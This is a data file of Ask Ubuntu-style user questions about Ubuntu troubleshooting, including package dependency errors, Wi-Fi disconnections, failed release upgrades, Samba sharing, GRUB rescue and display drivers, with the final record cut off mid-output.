514456	problem with phablet install process	have a problem like so many other with phablet tools i think there is problem with broken packages or something of that sort . offcourse i added the ppa beforethat first lsb putput distributor id : ubuntu description : ubuntu 12.04.5 lts release : 12.04 codename : precise $ sudo atp-get install phablet-tools gets me : building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : phablet-tools : depends : click but it is not going to be installed e : unable to correct problems , you have held broken packages . than tried $ sudo apt-get update which gets me some duplicates reading package lists ... done w : duplicate sources.list entry http : //archive.canonical.com/ubuntu/ precise/partner i386 packages ( /var/lib/apt/lists/archive.canonical.com_ubuntu_dists_precise_partner_binary-i386_packages ) w : you may want to run apt-get update to correct these problems i checked the file and there are no duplicates in file `` /var/lib/apt/lists/archive.canonical.com_ubuntu_dists_precise_partner_binary-i386_packages '' here is my apt sources.list and here is my sources.list.d folder structure if anybody can help i would be very thankful
514457	tap ( not hold ) right alt key to toggle to hangul ( korean )	i have to hold down the right alt key to type in english when using ibus-hangul and the korean ( hangul ) keyboard layout . however , on other operating systems i can just tap right alt to toggle input from hangul to english and back again , rather than having to hold it down . how can i fix this ? to clarify , the alternate character input hotkey in keyboard settings is set to right alt ( without this i can not change layout at all ) .
514465	what 's wrong with my wireless ?	i am having issues with my wireless connection . my connection is constantly disconnecting , then attempting to reconnect , reconnecting momentarily , then disconnecting etc . on times scales that range from seconds to minutes . in the meantime , needless to say i 'm having significant packet loss . i 'm running ubuntu 14.04 64bit , updated and upgraded to today . here is my card and driver : delta @ sager : ~ $ lspci -vq | grep -i wireless -b 1 -a 5 04:00.0 network controller : intel corporation wireless 7260 ( rev 73 ) subsystem : intel corporation dual band wireless-ac 7260 flags : bus master , fast devsel , latency 0 , irq 47 memory at f7d00000 ( 64-bit , non-prefetchable ) [ size=8k ] capabilities : kernel driver in use : iwlwifi here is my kernel : delta @ sager : ~ $ uname -r 3.13.0-34-generic none of the other machines on my home network are having these issues . windows vista is networking without issue for goodness sake ; - ) here is a small clipping from the output of dmesg . as you can see , i am getting a cfg80211 message of some sort over and over again ( fyi , i 've replaced my mac address with a series of dashes , so anytime there is a -- -- -- -- -- -- -- - , that was where the mac address was : [ 1881.739161 ] wlan1 : authenticate with -- -- -- -- -- -- -- - [ 1881.741561 ] wlan1 : send auth to -- -- -- -- -- -- -- - ( try 1/3 ) [ 1881.743440 ] wlan1 : authenticated [ 1881.746027 ] wlan1 : associate with -- -- -- -- -- -- -- - ( try 1/3 ) [ 1881.749244 ] wlan1 : rx assocresp from -- -- -- -- -- -- -- - ( capab=0x411 status=0 aid=4 ) [ 1881.754727 ] wlan1 : associated [ 1881.754827 ] cfg80211 : calling crda for country : us [ 1881.761552 ] cfg80211 : regulatory domain changed to country : us [ 1881.761559 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 1881.761564 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2700 mbm ) [ 1881.761568 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 1700 mbm ) [ 1881.761571 ] cfg80211 : ( 5250000 khz - 5330000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 1881.761574 ] cfg80211 : ( 5490000 khz - 5600000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 1881.761577 ] cfg80211 : ( 5650000 khz - 5710000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 1881.761580 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 3000 mbm ) [ 1881.761584 ] cfg80211 : ( 57240000 khz - 63720000 khz @ 2160000 khz ) , ( n/a , 4000 mbm ) [ 1882.391038 ] cfg80211 : calling crda to update world regulatory domain [ 1882.396254 ] cfg80211 : world regulatory domain updated : [ 1882.396260 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 1882.396265 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 1882.396268 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 1882.396271 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 1882.396274 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 1882.396277 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 1886.148252 ] wlan1 : authenticate with -- -- -- -- -- -- -- - [ 1886.150005 ] wlan1 : send auth to -- -- -- -- -- -- -- - ( try 1/3 ) [ 1886.151807 ] wlan1 : authenticated [ 1886.154847 ] wlan1 : associate with -- -- -- -- -- -- -- - ( try 1/3 ) [ 1886.158147 ] wlan1 : rx assocresp from -- -- -- -- -- -- -- - ( capab=0x411 status=0 aid=4 ) [ 1886.163464 ] wlan1 : associated [ 1886.163520 ] wlan1 : limiting tx power to 30 ( 30 - 0 ) dbm as advertised by -- -- -- -- -- -- -- - [ 1886.163588 ] cfg80211 : calling crda for country : us [ 1886.170500 ] cfg80211 : regulatory domain changed to country : us [ 1886.170508 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 1886.170513 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2700 mbm ) [ 1886.170517 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 1700 mbm ) [ 1886.170520 ] cfg80211 : ( 5250000 khz - 5330000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 1886.170523 ] cfg80211 : ( 5490000 khz - 5600000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 1886.170526 ] cfg80211 : ( 5650000 khz - 5710000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 1886.170529 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 3000 mbm ) [ 1886.170533 ] cfg80211 : ( 57240000 khz - 63720000 khz @ 2160000 khz ) , ( n/a , 4000 mbm ) [ 1887.200197 ] cfg80211 : calling crda to update world regulatory domain [ 1887.203655 ] cfg80211 : world regulatory domain updated : [ 1887.203659 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 1887.203662 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 1887.203664 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 1887.203666 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 1887.203668 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 1887.203670 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) i 've poked around on askubuntu , and have not found any adequate solutions ; have also found similar threads that were left unanswered . any advice/experience/threads i might be able to pull on would be greatly appreciated . in your opinion , is this a kernel issue , hardware issue , etc. ? thanks in advance . edit : chili , here 's the output of iwconfig : delta @ sager : ~ $ iwconfig wlan1 ieee 802.11abg essid : '' lanbeforetime '' mode : managed frequency:2.412 ghz access point : -- -- -- -- -- - bit rate=48 mb/s tx-power=16 dbm retry long limit:7 rts thr : off fragment thr : off power management : off link quality=44/70 signal level=-66 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:80 missed beacon:0 eth0 no wireless extensions . lo no wireless extensions .
514468	ca n't upgrade to 14.04 due to update-manager-kde being in the removal blacklist	trying to upgrade to new lts get error ... can not calculate upgrade ... and the upgrade stops . in /var/log/dist-upgrade/main.log : 2014-08-22 03:42:25,357 error dist-upgrade failed : 'the package 'update-manager-kde ' is marked for removal but it is in the removal blacklist . ' too scared to manually remove a package that is named update-manager-kde !
514469	error 255 samba share simple file share ubuntu 14.04	i have been using simple file share on ubuntu 12.04 for several years not a problem now i have up graded to 14.04 all the problems error 255 , tried all sights to fix the problem nothing works even went back to 12.04 still the same problemerror 255 'net usershare ' returned error 255 : net usershare add : can not convert name `` everyone '' to a sid . the connection was refused . maybe smbd is not running . there appears to be a bug with the new upgrade or has there been a new upgrade .
514471	overscan with noveau display driver	i 'm using opensource driver there is an overscan , my hdtv/monitor res.1920x1080 24 '' how can i configure the screen , if need more details let me know ( edges of the picture are lost ubuntu 14.04 lts nvidia gtx550ti graphic card
514472	ubuntu does n't load , ca n't even open a terminal to type commands , even after boot repair	when i start ubuntu i only get my desktop picture and am unable to open a terminal to type any commands . when i try a guest session all i get is a red ubuntu backdrop , nothing else . i tried boot repair but no improvement . summary information following boot repair : http : //paste.ubuntu.com/8109809/ i can paste some of it here if someone can tell me which part of it is relevant . this all occurred after i tried to remove compizconfig ( which i might not have completed ) , because it 's been using up my cpu ( running at 50-60 % with compiz at the top in system monitor . my laptop has been running very slow since installing ubuntu so i 've been trying to fix that , also website videos play slow and the startup of ubuntu has been faulty . i also installed a proprietory nvidia driver ( 304 ) before this launcher issue occurred , in an effort to fix my video problem ( did n't help anything ) . laptop is dell 620m with intel core 2 ; 1.83ghz , 2 gb ram , ubuntu 14.04 ( new to linux ) ; 66gb ubuntu partition . everything works fine on the small xp partition of my laptop , but i 've moved all my files to the larger ubuntu portion . i wanted to try some answers i found to similar questions but they all seem to involve commands in a terminal and i ca n't open a terminal . how can i get the launcher back , along with access to my programmes etc ? thank you for any help . update : the fixes i 've tried are the ones listed under this link : problems after upgrading to 14.04 ( only background and pointer after login ) i 've uninstalled nvidia-current and nvidia-304 , which seemed to help a bit ( but still no unity , launcher etc ) . i used nautilus to save copies of my files .
514477	ubuntu 12.04 lts login loop	i 'm asking this because initially , my problem was a power failure during installation so i typed the following instructions in the maintenance shell : sudo mount -o remount , rw / sudo dpkg -- configure a sudo mount -o remount , ro / sudo sync sudo reboot the first three lines worked , afterwards , my computer ( a dell inspiron 530 ) got stalled for several hours , so i unplugged it . when i turned it on , the log in screen appeared , and after i try to write my password , it leads me back to the log screen . i must note that when i typed the first three lines during the maintenance shell mode , it said that the errors which were encountered during processing were : initscripts bluez gnome-bluetooth also , i must add that i 've tried other solutions i 've found , such as changing the .xauthority file and when i type that it says : `w : not using locking for read only lock file /var/lib/dpkg/lock` so , what should i do to get rid of this issue ? it 's driving me crazy . also , if it ca n't be fixed , then what should i do to reinstall ubuntu without losing my /home files ? i 've tried the abovementioned instructions and still it does n't work . it marks certain problems with bluez and gnome-bluetooth . above are the screens : first screen second screen
514479	how do i install the latest mesa release ?	which is the preferred way to install the latest stable version of mesa on ubuntu ? i believe that would be a ppa , but not the bleeding-edge one like xorg-edgers . i would like to see a ppa that contains the latest stable release . right now 10.3 has reached release candidate stage and development branched to 10.4 , so the latest stable version is 10.2 . soon 10.3 will become the latest stable version and i 'd like a ppa that would follow that . for comparison , xorg-edgers contains 10.3.0~git20140821 and oibaf has 10.4~git1408211930 .
514481	zsnes problem - flashing lights	i 'm using zsnes and if a nautilus window is open or my background changes , the bars on the two sides of my screen start flashing wildly . what if i had epilepsy ? can anyone tell me how to fix this issue ?
514483	running an old version of some software	i do n't want to mingle in any backstory , but all that needs to be known is that i have a computer with ubuntu on it and i am trying to install windows 8 from an iso . i am using the guide that can be found here which is a little more than four years old . now , i 've been able to accomplish everything up to step 2 , at which point i am stuck . i have downloaded the file found on that page , which can be found here , and have attempted to use it , as directed , quote ; '' right click the downloaded unetbootin file , select properties and on the `` permissions '' tab , check the `` allow executing file as program '' box . then simply double click it and it should open . '' but , after having set checked the specified box and double clicking the file , nothing happens . nothing is launched and nothing changes . i 've been stuck here for several hours now , having failed to find a solution via google .
514484	steam ( dota ) amd - can not launch glgeterror	i installed ubuntu 14.04 on my acer aspire v today , downloaded and installed steam / dota 2 and when i try to launch dota i get an error stating , could not find required opengl entry point 'glgeterror ' ! either your video card is unsupported , or your opengl driver needs to be updated . any assistance is greatly appreciated .
514489	ubuntu 14.04 boot stuck on *checking battery state ... [ ok ]	on startup after the purple screen the boot sequence gets stuck on *checking battery state ... [ ok ] , i am stumped , any ideas ?
514494	ubuntu 14.04 - pdfs with forms create black bars on some pages	i 've been working with pdfs with forms , and recently i 've had some issues with a set of character sheets for d & d ; they come with forms so that you can save your character digitally , but when i use any of the document viewers , i get these horrible black bars in the places where the forms are supposed to be on half the pages . the weird part of it is that if i open the file in google chrome , i do n't get these black bars in these spots i 've never had this problem before , and going through the other form-fillable pdfs i have , none of them have the same issue . from that and the fact that this does not show up in chrome , it likely has something to do with the ubuntu pdf viewers and these files in particular . any help would be appreciated , if there 's any information i neglected to post please tell me . i had pictures , but apparently this site requires you to have 10 reputation to post pictures . this is my first post on this site , and i can understand , spammers and such , but it does hinder my question just a tad . edit : thank you jacob , i 'm a little tired and did n't think to post the images elsewhere . here is an imgur album of some examples . in order , it shows the pdf open in ocular , then evince , then a png of the pdf exported to gimp , and then google chrome .
514496	not able to extract file ( jar/zip )	i got this message when extracted the file of jar end-of-central-directory signature not found . either this file is not a zipfile , or it constitutes one disk of a multi-part archive . in the latter case the central directory and zipfile comment will be found on the last disk ( s ) of this archive . zipinfo : can not find zipfile directory in one of ~/.m2/repository/com/google/guava/guava/13.0/guava- 13.0.jar ~/.m2/repository/com/google/guava/guava/13.0/guava-13.0.jar.zip , and can not find ~/.m2/repository/com/google/guava/guava/13.0/guava-13.0.jar.zip , period i 'm on ubuntu 12.04lts
514499	how to set usb flash drive as first boot device in dell inspiron 15	i m trying to install ubuntu on dell inspiron 15 using usb flash drive using ussb installer . but in booting sequence there are only two boot options . legacy boot and uefi boot mode . can anyone tell me that how can i set the first boot device = usb flash drive. ? ? ?
514505	grub rescue giving unknown file system for all partitions	i have a lenovo g580 with windows 8 installed along with ubuntu 13.04 . i was using dual boot without any problems for one year . about a week ago my ubuntu stopped booting and instead i get booted to grub rescue . i have used ls command in grub rescue it shows that there are 12 partitions : ( hd0 ) , ( hd0 , gpt12 ) , ( hd0 , gpt11 ) , ( hd0 , gpt10 ) ... ... ( hd0 , gpt1 ) using ls on all these file systems gives the error message unknown filesystem . can someone tell me how to boot back to ubuntu , if not can someone tell me how to recover the data from ubuntu . i even tried to boot ubuntu from live usb and installed boot repair but that did not help either
514507	problems after installing ubuntu 14.04 on previous windows 7	i had windows 7 on my sony vaio e series laptop . yesterday i installed ubuntu 14.04 on it . now when i start my system , the internal hard disk ( seagate 500 gb ) is making an intense sound of clicking , and the system stops sometimes as well . my laptop is 4 years old .
514509	maximum duration for dual boot ( 8.1 and 14.04 )	i have just bought a lenovo i7 laptop with 500 gb hard i have installed windows 8.1 on partition # 1 of 360 gb and the remaining 95 gb is empty i want to install ubuntu 14.04. how long will it operate successfully and is 95 gb good to go ( if i install latest java ide ) . and what if i format partition # 1 after installing 14.04 will ubuntu stay there with out any affect .
514511	how can i run wine as root ?	i know that it 's not recommended but nevertheless . sudo wine is n't working
514512	problems with amd display after upgrade to 14.04	was using 12.04 ok for last 6 months with my pci graphics card which is amd radeon r7 200 series . had some initial problems but installed catalyst 13.101 driver and all worked fine . a few days ago i upgraded os to 14.04 and immediately the display was flaky with mouse trails and delays in updating parts of the screen . after next reboot the display was blank and found that it had reverted to the on-board intel graphics processor . i enabled proprietary drivers in software-sources to `` using video driver for the amd graphics accelerators from fglrx-updates ( proprietary ) '' and display seemed ok again ( like with 12.04 ) the problem now is that every other time i boot up , i get a black screen and pop-up stating that only `` limited graphics '' mode is available . its working just fine this time while i type this . how can i narrow done this problem and resolve it ?
514513	how to switch remotly from ubuntu and windows 7 and viceversa ?	i 'm looking around , if anyone have a suggestion on how to switch from ubuntu and windows 7 ( and viceversa ) while working remotely . actually , i 'm using the windows loader ( bcd ) on mbr , and i have 2 choice : windows 7 ubuntu 14.04 if i 'm working on windows 7 and want to boot to ubuntu , its easy , because i set as default ubuntu . so at restart , system go directly to grub ( with timeout sets to `` 0 '' ) and ubuntu is there . but how i could get back to windows again ? there is any chance ? while typing i was wondering if i could solve this trouble forcing windows loader to ubuntu and let grub2 to choose from different systems . could be work ?
514514	echo command not giving correct output	i try to create output like 12dec2013bhav.csv.zip in the script below . but it is giving me something like 12dec.csv.zip instead : for ( ( i = 2013 ; i < = 2014 ; i++ ) ) do for m in jan feb mar apr may jun jul aug sep oct nov dec do for ( ( d = 1 ; d < = 31 ; d++ ) ) do echo `` $ d $ m $ ibhav.csv.zip '' done done done how do i correct it ?
514515	is it possible to recover luks partition after windows install overwrites	yeah i installed windows so i can play video games with my brother , and windows decides to format the partition below it as /boot without telling me now i have lost everything , i am presuming there is no way to recover my luks partition as even quick formatting it to ntfs is enough to erase the header and rendering all my valuable data as securely erased ? please help ! i hate windows !
514525	i have no sound in my computer before and after update	i had 12.04 lts in my system . at that time there was no sound . so i thought there might be some software ( or drivers ) problem . so i updated it to 14.04.1 lts . still the problem is same . should change the sound card or anything else is wrong ? system details : processor i5 ... hdd 1 tb ... asus motherboard ... 4gb ram ... optical drive : samsung ... .
514526	ubuntu lock screen login box not showing	having a little bit of an issue over here . so i 'm running ubuntu 12.04 lts and up until yesterday i have n't had any real issues . however , when i lock the account i am unable to log back in because the login box is n't there . i have also tried simply typing my password and trying to log in anyway but this does not work . i can use the 'switch user account ' functionality to get the same effect but if i forget and lock it out of habit then i have to reboot ( using the power button ) ... so it 's not an ideal situation . so , has anyone had any similar issues and where should i be looking to find the cause ? thanks in advance for your help ! ryan
514527	ubuntu 12.04 lts to 14.04 lts failed to load session [ solved ]	i just upgraded from 12.04 lts to 14.04 lts . after the reboot i see the same user i had with 12.04 but the previous password does not work . i wonder whether this behaviour is normal and i have to reset the password . thank you .
514530	how to change preferred release type for a server to lts ?	one of our servers in running 12.04.4 lts . on login , it states : new release '12.10 ' available . run 'do-release-upgrade ' to upgrade to it . i know it 's possible to change a setting to only notify of lts releases , and to only upgrade to lts releases , in the desktop ui , but how do i do that for an ubuntu server installation ?
514534	how to transfer public and private pgp keys to another computer ?	how do i transfer public and private pgp keys to a mac os x lion machine ?
514535	copying first 1000 pdf files having single , double quotes in their name to another folder	i am having this folder with pdfs into it and i need to process 1000 at a time . so i need to move them into another folder , process them and delete them . for this i tried using $ find . -maxdepth 1 -type f |head -1000|xargs cp -t $ destdir it gives error on single and double quotes in filename . there are thousands of files and i have no idea how many of them has these quotes in them . can anyone help me find a solution ? and i tried with the -0 option , it did not work
514536	search capability does not work since upgrade to 14.04	when i do a search ( ctrl+f ) in libreoffice writer only one letter is accepted , like in some sort of overwrite mode . the same happens , for example , in gedit . however a ctrl+f search from the browser does work . as a workaround i copy and paste the word i 'm looking for in the search window .
514537	ubuntu 14.04 - blocked after suspending	i 've updated my sony vaio pcg-3c1m to ubuntu 14.04 and since then i have this issue , when the laptop goes for suspension , usually when the screen is closed , the laptop ca n't `` wake up '' after that . after the screen is closed if you open it again it is blocked , without the login/password screen , and after 40 secs or so , it goes to black screen and i have to restart the laptop . does anyone knows the solution for this ?
514539	updated to 14.04 and now my basic terminal commands such as `` ls '' dont work ?	when i open terminal and then type in ls this is what i get : i 'm guessing there 's an issue with my bashrc or something similar but i ca n't figure out what to change , any help would be much appreciated
514543	tor error permission issue	i 've tried reinstalling , updating , and removing and then reinstalling . nothing seems to work . see screenshot below : the output of gedit /home/skynet/.tor-browser-en/log ( the installation log ) is : /usr/bin/tor-browser-en.sh : your version in /home/skynet/.tor-browser-en is outdated or you do not have installed tor-browser-en yet . /usr/bin/tor-browser-en.sh : extracting files to /home/skynet/.tor-browser-en/install . tar ( child ) : /opt/tor-browser-en/tor-browser-linux64-3.6.2_en-us.tar.xz : can not open : no such file or directory tar ( child ) : error is not recoverable : exiting now tar : child returned status 2 tar : error is not recoverable : exiting now
514544	ubuntu 14.04 with 3d acceleration on virtual box freezes after save state	i have ubuntu 14.04 running in virtual box with 3d acceleration enabled . when i save the state of the machine and then resume from that saved state , the system is completely unresponsive . i 'm unable to take any action except for shutting off the power to the machine . if i turn off 3d acceleration , this problem disappears . has anyone else experienced this issue ? here 's some information on my setup : host : os x 10.9.4 virtual box version : 4.3.14
514547	ca n't play in my app *.amr file ? in ubuntu touch	in audio { } qml file *.amr do n't play in ubuntu touch on nexus 4 is it normal i have the last image r203 *.wav or *.mp3 play but the file size is greater then *.amrďťż
514549	how can i redirect the contents of a file to the pastebinit command ?	whenever i was to store something to show someone here , i run command-with-output | pastebinit . that returns the link to the paste online . for example : echo timtjtim | pastebinit gave me the link paste.ubuntu.com/8010000 which i can share . how can i do this with a file - for example a log file . surely i do n't have to open - > copy all - > open paste.ubuntu.com - > paste it ?
514553	new monitor - reset graphics 14.04	have new monitor , but resolution stuck at that of old monitor . new monitor is 16:9 but resolution stuck at 5:4 so how do i reset the monitor detection and get a good resolution on the new monitor ?
514555	ubuntu 12.04 + wifi not working	i 'm having problems connecting over wireless . at the moment , i 'm using wicd . it seems to get stuck on `` verifying ap association ... '' . without wicd i can get the connection up and ping the net - but if i take eth0 down ( ifconfig eth0 down ) , my wireless goes away too ( same result if i unplug the wire instead ) . wicd is the only way i can bring eth0 back ( which is the main reason i 'm using it ) - ifconfig eth0 and/or ifup eth0 do not re-enable the connection ( i just discovered it leaves out the gateway . adding the gateway back in re-enables the connection including wifi ; i did n't want to delete the info about wicd above in case it gives someone an idea . ) doing it manually , despite the errors ( which it would be nice to also resolve ) - allows me to ping the outside world : ifup wlan0 ioctl [ siocsiwencodeext ] : invalid argument ioctl [ siocsiwencodeext ] : invalid argument ssh stop/waiting ssh start/running , process 17336 ping -i wlan0 -c 4 8.8.8.8 ping 8.8.8.8 ( 8.8.8.8 ) from 192.168.0.12 wlan0 : 56 ( 84 ) bytes of data . 64 bytes from 8.8.8.8 : icmp_req=1 ttl=43 time=48.8 ms 64 bytes from 8.8.8.8 : icmp_req=2 ttl=43 time=47.9 ms 64 bytes from 8.8.8.8 : icmp_req=3 ttl=43 time=48.7 ms 64 bytes from 8.8.8.8 : icmp_req=4 ttl=43 time=53.2 ms -- - 8.8.8.8 ping statistics -- - 4 packets transmitted , 4 received , 0 % packet loss , time 3003ms rtt min/avg/max/mdev = 47.975/49.711/53.235/2.063 ms # iwconfig lo no wireless extensions . wlan0 ieee 802.11bgn essid : '' tplink '' mode : managed frequency:2.427 ghz access point : 64:66 : xx : xx : xx:22 bit rate=108 mb/s tx-power=27 dbm retry long limit:7 rts thr : off fragment thr : off encryption key : off power management : off link quality=70/70 signal level=-39 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:3 missed beacon:0 bus info : pci @ 0000:03:00.0 logical name : wlan0 version : 01 serial : f0:7d:68 : c1 : b4:13 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=ath9k driverversion=3.2.0-67-generic-pae firmware=n/a latency=0 link=no multicast=yes wireless=ieee 802.11bgn resources : irq:17 memory : dfbf0000-dfbfffff ip route default via 192.168.0.1 dev eth0 default via 192.168.0.1 dev wlan0 metric 100 169.254.0.0/16 dev wlan0 scope link metric 1000 192.168.0.0/24 dev eth0 proto kernel scope link src 192.168.0.102 192.168.0.0/24 dev wlan0 proto kernel scope link src 192.168.0.12 ( for the record , i have no idea what the 169.254.0.0 address is doing there . ) uname -a 3.2.0-67-generic-pae # 101-ubuntu smp tue jul 15 18:04:54 utc 2014 i686 i686 i386 gnu/linux lshw -c network *-network description : ethernet interface product : netxtreme bcm5751 gigabit ethernet pci express vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:02:00.0 logical name : eth0 version : 01 serial : 00:11:11:59 : fc:09 size : 100mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm vpd msi pciexpress bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=tg3 driverversion=3.121 duplex=full firmware=5751-v3.23a ip=192.168.0.102 latency=0 link=yes multicast=yes port=twisted pair speed=100mbit/s resources : irq:16 memory : dfcf0000-dfcfffff *-network description : wireless interface product : ar5418 wireless network adapter [ ar5008e 802.11 ( a ) bgn ] ( pci-express ) vendor : qualcomm atheros physical id : 0 /etc/network/interfaces # interfaces ( 5 ) file used by ifup ( 8 ) and ifdown ( 8 ) auto lo iface lo inet loopback source /etc/network/interfaces.eth0 source /etc/network/interfaces.wlan0 /etc/network/interfaces.eth0 # main interface auto eth0 iface eth0 inet static address 192.168.0.102 netmask 255.255.255.0 gateway 192.168.0.1 /etc/network/interfaces.wlan0 auto wlan0 iface wlan0 inet static address 192.168.0.12 gateway 192.168.0.1 dns-nameservers 192.168.0.1 8.8.8.8 netmask 255.255.255.0 wpa-driver wext wpa-ssid tplink wpa-ap-scan 1 wpa-proto rsn wpa-pairwise ccmp wpa-group ccmp wpa-key-mgmt wpa-psk wpa-psk dca1badb5fd4e9axxx4xxdaaxxfa91xx610bxx6a7d57ef67af9809dxx6af42e39 /etc/wpa_supplicant.conf ctrl_interface=/var/run/wpa_supplicant network= { ssid= '' tplink '' psk= '' my password '' key_mgmt=wpa-psk proto=rsn pairwise=ccmp group=ccmp } ifdown eth0 ifdown : interface eth0 not configured ifconfig eth0 link encap : ethernet hwaddr 00:11 : xx : xx : xx:09 inet addr:192.168.0.102 bcast:192.168.0.255 mask:255.255.255.0 inet6 addr : fe80 : :211:11ff : fe59 : fc09/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:213690 errors:0 dropped:0 overruns:0 frame:0 tx packets:155266 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:220057808 ( 220.0 mb ) tx bytes:21137696 ( 21.1 mb ) interrupt:16 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:196412 errors:0 dropped:0 overruns:0 frame:0 tx packets:196412 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:153270697 ( 153.2 mb ) tx bytes:153270697 ( 153.2 mb ) wlan0 link encap : ethernet hwaddr f0:7d : xx : xx : xx:13 inet addr:192.168.0.12 bcast:192.168.0.255 mask:255.255.255.0 inet6 addr : fe80 : :f27d:68ff : fec1 : b413/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:11335 errors:0 dropped:0 overruns:0 frame:0 tx packets:7287 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:2563290 ( 2.5 mb ) tx bytes:855746 ( 855.7 kb ) ifconfig eth0 down ifconfig eth0 link encap : ethernet hwaddr 00 : xx : xx : xx : xx:09 inet addr:192.168.0.102 bcast:192.168.0.255 mask:255.255.255.0 inet6 addr : fe80 : :211:11ff : fe59 : fc09/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:2 errors:0 dropped:0 overruns:0 frame:0 tx packets:1 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:192 ( 192.0 b ) tx bytes:94 ( 94.0 b ) interrupt:16 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:196418 errors:0 dropped:0 overruns:0 frame:0 tx packets:196418 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:153270871 ( 153.2 mb ) tx bytes:153270871 ( 153.2 mb ) wlan0 link encap : ethernet hwaddr f0:7d : xx : xx : xx:13 inet addr:192.168.0.12 bcast:192.168.0.255 mask:255.255.255.0 inet6 addr : fe80 : :f27d:68ff : fec1 : b413/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:11359 errors:0 dropped:0 overruns:0 frame:0 tx packets:7293 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:2565482 ( 2.5 mb ) tx bytes:856363 ( 856.3 kb ) ip route default via 192.168.0.1 dev wlan0 metric 100 169.254.0.0/16 dev wlan0 scope link metric 1000 192.168.0.0/24 dev wlan0 proto kernel scope link src 192.168.0.12 192.168.0.0/24 dev eth0 proto kernel scope link src 192.168.0.102 ping -i wlan0 -c 4 8.8.8.8 ping 8.8.8.8 ( 8.8.8.8 ) from 192.168.0.12 wlan0 : 56 ( 84 ) bytes of data . -- - 8.8.8.8 ping statistics -- - 4 packets transmitted , 0 received , 100 % packet loss , time 3024ms ping -i eth0 -c 3 router ping router ( 192.168.0.1 ) from 192.168.0.102 eth0 : 56 ( 84 ) bytes of data . -- - router ping statistics -- - 3 packets transmitted , 0 received , 100 % packet loss , time 2015ms ping -i wlan0 -c 3 router ping router ( 192.168.0.1 ) from 192.168.0.12 wlan0 : 56 ( 84 ) bytes of data . -- - router ping statistics -- - 3 packets transmitted , 0 received , 100 % packet loss , time 2014ms let me know if you need more info . thank you in advance . # # the results : ifup wlan0 wpa_supplicant : /sbin/wpa_supplicant daemon failed to start run-parts : /etc/network/if-pre-up.d/wpasupplicant exited with return code 1 rtnetlink answers : file exists failed to bring up wlan0 . so i killed wpa_supplicant ( with sighup ) and reran ifup wlan0 : rtnetlink answers : file exists failed to bring up wlan0 . syslog states : wpa_supplicant [ 13626 ] : failed to initiate ap scan wpa_supplicant [ 13626 ] : message repeated 409 times : [ failed to initiate ap scan . ] ps -ef | grep wpa root 13626 1 0 11:13 ? 